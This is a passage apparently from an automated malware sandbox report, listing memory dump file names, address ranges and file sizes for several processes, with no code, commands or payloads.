                                                                                                                                                                                                                      • memory/1764-947-0x0000000003950000-0x0000000003B52000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        2.0MB

                                                                                                                                                                                                                      • memory/1764-1044-0x0000000000400000-0x00000000004BE000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        760KB

                                                                                                                                                                                                                      • memory/1764-1141-0x0000000003950000-0x0000000003B52000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        2.0MB

                                                                                                                                                                                                                      • memory/1796-866-0x0000000001320000-0x0000000001E76000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        11.3MB

                                                                                                                                                                                                                      • memory/1796-1134-0x0000000001320000-0x0000000001E76000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        11.3MB

                                                                                                                                                                                                                      • memory/1796-1043-0x0000000001320000-0x0000000001E76000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        11.3MB

                                                                                                                                                                                                                      • memory/1808-4-0x000007FEFD230000-0x000007FEFD29C000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        432KB

                                                                                                                                                                                                                      • memory/1808-5-0x000007FEFD230000-0x000007FEFD29C000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        432KB

                                                                                                                                                                                                                      • memory/1808-799-0x000007FEFD230000-0x000007FEFD29C000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        432KB

                                                                                                                                                                                                                      • memory/1808-0-0x0000000140000000-0x000000014099F000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        9.6MB

                                                                                                                                                                                                                      • memory/1808-1635-0x000007FEFD230000-0x000007FEFD29C000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        432KB

                                                                                                                                                                                                                      • memory/1808-808-0x0000000140000000-0x000000014099F000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        9.6MB

                                                                                                                                                                                                                      • memory/1808-798-0x000007FEFD243000-0x000007FEFD244000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/1808-1005-0x0000000140000000-0x000000014099F000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        9.6MB

                                                                                                                                                                                                                      • memory/1808-221-0x0000000140000000-0x000000014099F000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        9.6MB

                                                                                                                                                                                                                      • memory/1808-809-0x000007FEFD230000-0x000007FEFD29C000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        432KB

                                                                                                                                                                                                                      • memory/1808-6-0x000007FEFD230000-0x000007FEFD29C000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        432KB

                                                                                                                                                                                                                      • memory/1808-1-0x000007FEFD243000-0x000007FEFD244000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/1808-1634-0x0000000140000000-0x000000014099F000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        9.6MB

                                                                                                                                                                                                                      • memory/1808-3-0x000007FEFD230000-0x000007FEFD29C000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        432KB

                                                                                                                                                                                                                      • memory/1808-2-0x000007FEFD230000-0x000007FEFD29C000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        432KB

                                                                                                                                                                                                                      • memory/1940-1263-0x000000001B630000-0x000000001B912000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        2.9MB

                                                                                                                                                                                                                      • memory/1940-1264-0x0000000002860000-0x0000000002868000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        32KB

                                                                                                                                                                                                                      • memory/2112-882-0x0000000000FE0000-0x0000000001735000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        7.3MB

                                                                                                                                                                                                                      • memory/2180-1013-0x0000000000400000-0x0000000002959000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        37.3MB

                                                                                                                                                                                                                      • memory/2180-997-0x00000000042A0000-0x0000000004698000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4.0MB

                                                                                                                                                                                                                      • memory/2212-1279-0x0000000000E70000-0x00000000014DA000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        6.4MB

                                                                                                                                                                                                                      • memory/2212-1142-0x0000000000E70000-0x00000000014DA000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        6.4MB

                                                                                                                                                                                                                      • memory/2212-1314-0x0000000000E70000-0x00000000014DA000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        6.4MB

                                                                                                                                                                                                                      • memory/2256-986-0x0000000002400000-0x0000000002A6A000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        6.4MB

                                                                                                                                                                                                                      • memory/2256-1245-0x0000000002400000-0x0000000002A6A000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        6.4MB

                                                                                                                                                                                                                      • memory/2292-998-0x0000000000400000-0x0000000000602000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        2.0MB

                                                                                                                                                                                                                      • memory/2292-949-0x0000000000400000-0x0000000000602000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        2.0MB

                                                                                                                                                                                                                      • memory/2292-1002-0x0000000000400000-0x0000000000602000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        2.0MB

                                                                                                                                                                                                                      • memory/2380-939-0x0000000077410000-0x0000000077412000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                      • memory/2380-937-0x0000000077410000-0x0000000077412000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                      • memory/2380-935-0x0000000077410000-0x0000000077412000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                      • memory/2380-940-0x0000000140000000-0x0000000141A5C000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        26.4MB

                                                                                                                                                                                                                      • memory/2500-1582-0x00000000010E0000-0x000000000174A000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        6.4MB

                                                                                                                                                                                                                      • memory/2500-1315-0x00000000010E0000-0x000000000174A000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        6.4MB

                                                                                                                                                                                                                      • memory/2508-1268-0x0000000000400000-0x0000000000602000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        2.0MB

                                                                                                                                                                                                                      • memory/2508-1006-0x0000000000400000-0x0000000000602000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        2.0MB

                                                                                                                                                                                                                      • memory/2532-1040-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        80KB

                                                                                                                                                                                                                      • memory/2532-854-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        80KB

                                                                                                                                                                                                                      • memory/2576-992-0x0000000000200000-0x000000000086A000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        6.4MB

                                                                                                                                                                                                                      • memory/2576-994-0x00000000011A0000-0x000000000180A000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        6.4MB

                                                                                                                                                                                                                      • memory/2576-1051-0x0000000010000000-0x00000000105E3000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        5.9MB

                                                                                                                                                                                                                      • memory/2576-1267-0x00000000011A0000-0x000000000180A000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        6.4MB

                                                                                                                                                                                                                      • memory/2576-1266-0x00000000011A0000-0x000000000180A000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        6.4MB

                                                                                                                                                                                                                      • memory/2576-1247-0x0000000000200000-0x000000000086A000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        6.4MB

                                                                                                                                                                                                                      • memory/2576-1579-0x0000000000200000-0x000000000086A000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        6.4MB

                                                                                                                                                                                                                      • memory/2576-1253-0x00000000011A0000-0x000000000180A000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        6.4MB

                                                                                                                                                                                                                      • memory/2576-995-0x00000000011A0000-0x000000000180A000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        6.4MB

                                                                                                                                                                                                                      • memory/2576-993-0x00000000011A0000-0x000000000180A000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        6.4MB

                                                                                                                                                                                                                      • memory/2768-1104-0x0000000140000000-0x000000014000E000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        56KB

                                                                                                                                                                                                                      • memory/2768-1102-0x0000000140000000-0x000000014000E000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        56KB

                                                                                                                                                                                                                      • memory/2768-1103-0x0000000140000000-0x000000014000E000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        56KB

                                                                                                                                                                                                                      • memory/2768-1105-0x0000000140000000-0x000000014000E000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        56KB

                                                                                                                                                                                                                      • memory/2796-1014-0x0000000061E00000-0x0000000061EF3000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        972KB

                                                                                                                                                                                                                      • memory/2796-1041-0x0000000000400000-0x0000000002576000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        33.5MB